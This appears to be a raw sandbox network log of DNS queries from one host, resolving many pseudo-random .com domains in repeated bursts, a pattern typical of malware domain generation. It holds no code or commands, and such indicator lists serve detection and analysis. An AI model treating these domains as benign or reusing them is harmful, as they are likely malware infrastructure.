Aug 23, 2024 18:43:03.456274986 CEST	192.168.2.5	1.1.1.1	0xb439	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.456577063 CEST	192.168.2.5	1.1.1.1	0xfdd4	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.457055092 CEST	192.168.2.5	1.1.1.1	0xbb85	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.457271099 CEST	192.168.2.5	1.1.1.1	0x2c2d	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.457551956 CEST	192.168.2.5	1.1.1.1	0x6c0d	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.457963943 CEST	192.168.2.5	1.1.1.1	0x87d6	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.458268881 CEST	192.168.2.5	1.1.1.1	0xfd5b	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.458714008 CEST	192.168.2.5	1.1.1.1	0x1d09	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.458937883 CEST	192.168.2.5	1.1.1.1	0x7702	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.459604979 CEST	192.168.2.5	1.1.1.1	0xdd9e	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.460618019 CEST	192.168.2.5	1.1.1.1	0xe7ce	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.461153030 CEST	192.168.2.5	1.1.1.1	0xfc4f	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.461600065 CEST	192.168.2.5	1.1.1.1	0x2ed8	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.468436956 CEST	192.168.2.5	1.1.1.1	0x2c58	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.488928080 CEST	192.168.2.5	1.1.1.1	0x40d3	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.490478992 CEST	192.168.2.5	1.1.1.1	0xc627	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.490631104 CEST	192.168.2.5	1.1.1.1	0x98fe	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.493716002 CEST	192.168.2.5	1.1.1.1	0xb0d9	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.493890047 CEST	192.168.2.5	1.1.1.1	0xedce	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.500930071 CEST	192.168.2.5	1.1.1.1	0xa62d	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.501184940 CEST	192.168.2.5	1.1.1.1	0xa75	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.521121979 CEST	192.168.2.5	1.1.1.1	0xab37	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.546303034 CEST	192.168.2.5	1.1.1.1	0x4246	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.546844006 CEST	192.168.2.5	1.1.1.1	0x6939	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.547138929 CEST	192.168.2.5	1.1.1.1	0xc26b	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.549735069 CEST	192.168.2.5	1.1.1.1	0x8a64	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.550647020 CEST	192.168.2.5	1.1.1.1	0x3496	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.551532030 CEST	192.168.2.5	1.1.1.1	0x4fef	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.551753998 CEST	192.168.2.5	1.1.1.1	0x2cad	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.552184105 CEST	192.168.2.5	1.1.1.1	0x26f1	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.552617073 CEST	192.168.2.5	1.1.1.1	0xed54	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.552798033 CEST	192.168.2.5	1.1.1.1	0xe249	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.553114891 CEST	192.168.2.5	1.1.1.1	0xeae9	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.553329945 CEST	192.168.2.5	1.1.1.1	0xff74	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.553472042 CEST	192.168.2.5	1.1.1.1	0x5753	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.553837061 CEST	192.168.2.5	1.1.1.1	0x4441	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.554044008 CEST	192.168.2.5	1.1.1.1	0xf5ef	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.559703112 CEST	192.168.2.5	1.1.1.1	0xfbd2	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.559871912 CEST	192.168.2.5	1.1.1.1	0x3ef2	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.560266972 CEST	192.168.2.5	1.1.1.1	0xa465	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.560430050 CEST	192.168.2.5	1.1.1.1	0xa16d	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.560761929 CEST	192.168.2.5	1.1.1.1	0xebb9	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.561131001 CEST	192.168.2.5	1.1.1.1	0xf17f	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.561281919 CEST	192.168.2.5	1.1.1.1	0xbb0	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.561707020 CEST	192.168.2.5	1.1.1.1	0xb4e5	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.561980009 CEST	192.168.2.5	1.1.1.1	0x283d	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.562264919 CEST	192.168.2.5	1.1.1.1	0x6c0	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.562453032 CEST	192.168.2.5	1.1.1.1	0xe041	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.562865973 CEST	192.168.2.5	1.1.1.1	0x8ce4	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.563458920 CEST	192.168.2.5	1.1.1.1	0x1efe	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.568617105 CEST	192.168.2.5	1.1.1.1	0x6c76	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.574039936 CEST	192.168.2.5	1.1.1.1	0xf2b2	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.574327946 CEST	192.168.2.5	1.1.1.1	0xe58b	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.574475050 CEST	192.168.2.5	1.1.1.1	0x88b	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.575295925 CEST	192.168.2.5	1.1.1.1	0x23d5	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.575539112 CEST	192.168.2.5	1.1.1.1	0x62ca	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.575697899 CEST	192.168.2.5	1.1.1.1	0xf21e	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.575886011 CEST	192.168.2.5	1.1.1.1	0x3b2e	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.585859060 CEST	192.168.2.5	1.1.1.1	0x28dc	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.586194992 CEST	192.168.2.5	1.1.1.1	0x2d31	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.586365938 CEST	192.168.2.5	1.1.1.1	0x356b	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.586855888 CEST	192.168.2.5	1.1.1.1	0x5e6d	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.587583065 CEST	192.168.2.5	1.1.1.1	0x4f1	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.587827921 CEST	192.168.2.5	1.1.1.1	0x96ef	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.609638929 CEST	192.168.2.5	1.1.1.1	0x7a03	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.609910965 CEST	192.168.2.5	1.1.1.1	0xf323	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.611067057 CEST	192.168.2.5	1.1.1.1	0x4065	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.612018108 CEST	192.168.2.5	1.1.1.1	0xa651	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.612225056 CEST	192.168.2.5	1.1.1.1	0x28b2	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.612380981 CEST	192.168.2.5	1.1.1.1	0xc834	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.612718105 CEST	192.168.2.5	1.1.1.1	0x61e8	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.612951040 CEST	192.168.2.5	1.1.1.1	0x57c7	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.612976074 CEST	192.168.2.5	1.1.1.1	0xd641	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.613156080 CEST	192.168.2.5	1.1.1.1	0x8e93	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.613200903 CEST	192.168.2.5	1.1.1.1	0xb14	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.613281965 CEST	192.168.2.5	1.1.1.1	0x8047	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.613316059 CEST	192.168.2.5	1.1.1.1	0xca93	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.613559961 CEST	192.168.2.5	1.1.1.1	0xa395	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.613571882 CEST	192.168.2.5	1.1.1.1	0x96f1	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.613801003 CEST	192.168.2.5	1.1.1.1	0xbc9e	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.613883018 CEST	192.168.2.5	1.1.1.1	0xd2cd	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.614042997 CEST	192.168.2.5	1.1.1.1	0xf1a6	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.614192963 CEST	192.168.2.5	1.1.1.1	0x7cae	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.614231110 CEST	192.168.2.5	1.1.1.1	0x2296	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.614339113 CEST	192.168.2.5	1.1.1.1	0xb523	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.614517927 CEST	192.168.2.5	1.1.1.1	0x7c4b	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.614552021 CEST	192.168.2.5	1.1.1.1	0xc75c	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.614733934 CEST	192.168.2.5	1.1.1.1	0xb462	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.614978075 CEST	192.168.2.5	1.1.1.1	0x496d	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.614994049 CEST	192.168.2.5	1.1.1.1	0x1c74	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.615159988 CEST	192.168.2.5	1.1.1.1	0x1223	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.621700048 CEST	192.168.2.5	1.1.1.1	0xb24f	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.621758938 CEST	192.168.2.5	1.1.1.1	0xfde0	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.630985022 CEST	192.168.2.5	1.1.1.1	0x6a36	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.631162882 CEST	192.168.2.5	1.1.1.1	0x6d21	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.631316900 CEST	192.168.2.5	1.1.1.1	0x7f1c	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.631450891 CEST	192.168.2.5	1.1.1.1	0x3b2e	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.631671906 CEST	192.168.2.5	1.1.1.1	0xe2e8	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.631911993 CEST	192.168.2.5	1.1.1.1	0x4132	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.632046938 CEST	192.168.2.5	1.1.1.1	0x393a	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.632183075 CEST	192.168.2.5	1.1.1.1	0xef99	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.632313967 CEST	192.168.2.5	1.1.1.1	0x3159	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.632441998 CEST	192.168.2.5	1.1.1.1	0x1852	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.632586956 CEST	192.168.2.5	1.1.1.1	0xa401	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.632725000 CEST	192.168.2.5	1.1.1.1	0x9247	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.632864952 CEST	192.168.2.5	1.1.1.1	0x1b0a	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.633044958 CEST	192.168.2.5	1.1.1.1	0xb9f4	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.633187056 CEST	192.168.2.5	1.1.1.1	0x5f7c	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.633318901 CEST	192.168.2.5	1.1.1.1	0xfdea	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.633461952 CEST	192.168.2.5	1.1.1.1	0xbde0	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.633621931 CEST	192.168.2.5	1.1.1.1	0x5ba6	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.633747101 CEST	192.168.2.5	1.1.1.1	0x42a7	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.633884907 CEST	192.168.2.5	1.1.1.1	0x2b96	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.634083033 CEST	192.168.2.5	1.1.1.1	0xe909	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.634215117 CEST	192.168.2.5	1.1.1.1	0x9a00	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.634457111 CEST	192.168.2.5	1.1.1.1	0x6b3b	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.634592056 CEST	192.168.2.5	1.1.1.1	0xb546	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.634850025 CEST	192.168.2.5	1.1.1.1	0x612	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.635010958 CEST	192.168.2.5	1.1.1.1	0x6239	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.635226011 CEST	192.168.2.5	1.1.1.1	0x1ac2	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.635375023 CEST	192.168.2.5	1.1.1.1	0xf747	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.635598898 CEST	192.168.2.5	1.1.1.1	0xd707	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.635860920 CEST	192.168.2.5	1.1.1.1	0xb5c6	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.636116028 CEST	192.168.2.5	1.1.1.1	0xb04b	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.636265039 CEST	192.168.2.5	1.1.1.1	0x51fd	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.636401892 CEST	192.168.2.5	1.1.1.1	0x27b6	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.636559963 CEST	192.168.2.5	1.1.1.1	0xdb3a	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.636821032 CEST	192.168.2.5	1.1.1.1	0xa966	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.636975050 CEST	192.168.2.5	1.1.1.1	0xbaf4	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.637142897 CEST	192.168.2.5	1.1.1.1	0xb796	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.637326956 CEST	192.168.2.5	1.1.1.1	0xc544	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.637484074 CEST	192.168.2.5	1.1.1.1	0x44c8	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.637664080 CEST	192.168.2.5	1.1.1.1	0xd3ba	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.637818098 CEST	192.168.2.5	1.1.1.1	0xb009	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.637979984 CEST	192.168.2.5	1.1.1.1	0xd08	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.638216019 CEST	192.168.2.5	1.1.1.1	0x3b41	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.638504028 CEST	192.168.2.5	1.1.1.1	0xa9ac	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.638814926 CEST	192.168.2.5	1.1.1.1	0x3fc8	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.688738108 CEST	192.168.2.5	1.1.1.1	0xb15b	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.689682961 CEST	192.168.2.5	1.1.1.1	0xc68c	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.690074921 CEST	192.168.2.5	1.1.1.1	0x9249	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.690501928 CEST	192.168.2.5	1.1.1.1	0x2f0a	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.690923929 CEST	192.168.2.5	1.1.1.1	0x4aa8	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.691229105 CEST	192.168.2.5	1.1.1.1	0x3ce6	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.691494942 CEST	192.168.2.5	1.1.1.1	0xea59	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.691646099 CEST	192.168.2.5	1.1.1.1	0x4130	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.691838980 CEST	192.168.2.5	1.1.1.1	0x42b6	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.692228079 CEST	192.168.2.5	1.1.1.1	0x7378	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.692493916 CEST	192.168.2.5	1.1.1.1	0xd6ea	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.692747116 CEST	192.168.2.5	1.1.1.1	0x6ad6	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.692990065 CEST	192.168.2.5	1.1.1.1	0x6c15	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.693141937 CEST	192.168.2.5	1.1.1.1	0x8ea3	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.693484068 CEST	192.168.2.5	1.1.1.1	0x8c31	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.694334030 CEST	192.168.2.5	1.1.1.1	0xfee7	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.694662094 CEST	192.168.2.5	1.1.1.1	0x56b1	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.701884985 CEST	192.168.2.5	1.1.1.1	0xe9ce	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.702312946 CEST	192.168.2.5	1.1.1.1	0xc250	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.702799082 CEST	192.168.2.5	1.1.1.1	0x4b04	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.702970982 CEST	192.168.2.5	1.1.1.1	0x86b5	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.703850985 CEST	192.168.2.5	1.1.1.1	0x4a7	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.704088926 CEST	192.168.2.5	1.1.1.1	0x3e61	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.704814911 CEST	192.168.2.5	1.1.1.1	0x2716	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.704961061 CEST	192.168.2.5	1.1.1.1	0x3efb	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.705106974 CEST	192.168.2.5	1.1.1.1	0xbbc9	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.705257893 CEST	192.168.2.5	1.1.1.1	0xb7db	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.705411911 CEST	192.168.2.5	1.1.1.1	0xc48c	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.725159883 CEST	192.168.2.5	1.1.1.1	0x4385	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.725317955 CEST	192.168.2.5	1.1.1.1	0xd80a	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.725796938 CEST	192.168.2.5	1.1.1.1	0xbf6	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.726485014 CEST	192.168.2.5	1.1.1.1	0xdab1	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.726624966 CEST	192.168.2.5	1.1.1.1	0x105c	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.727029085 CEST	192.168.2.5	1.1.1.1	0xc6c3	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.727554083 CEST	192.168.2.5	1.1.1.1	0x65b6	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.727806091 CEST	192.168.2.5	1.1.1.1	0x8bb7	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.728174925 CEST	192.168.2.5	1.1.1.1	0x66e2	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.741302013 CEST	192.168.2.5	1.1.1.1	0xcafb	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.741462946 CEST	192.168.2.5	1.1.1.1	0xfeed	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.741626024 CEST	192.168.2.5	1.1.1.1	0x28d1	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.743180990 CEST	192.168.2.5	1.1.1.1	0x5246	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.743451118 CEST	192.168.2.5	1.1.1.1	0x9ffb	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.743823051 CEST	192.168.2.5	1.1.1.1	0x607	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.744005919 CEST	192.168.2.5	1.1.1.1	0xeeeb	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.744149923 CEST	192.168.2.5	1.1.1.1	0x124c	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.744290113 CEST	192.168.2.5	1.1.1.1	0x2fe1	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.744479895 CEST	192.168.2.5	1.1.1.1	0x9a6c	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.744679928 CEST	192.168.2.5	1.1.1.1	0xfdd	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.776149035 CEST	192.168.2.5	1.1.1.1	0xb09e	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:03.789659977 CEST	192.168.2.5	1.1.1.1	0x9e5d	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
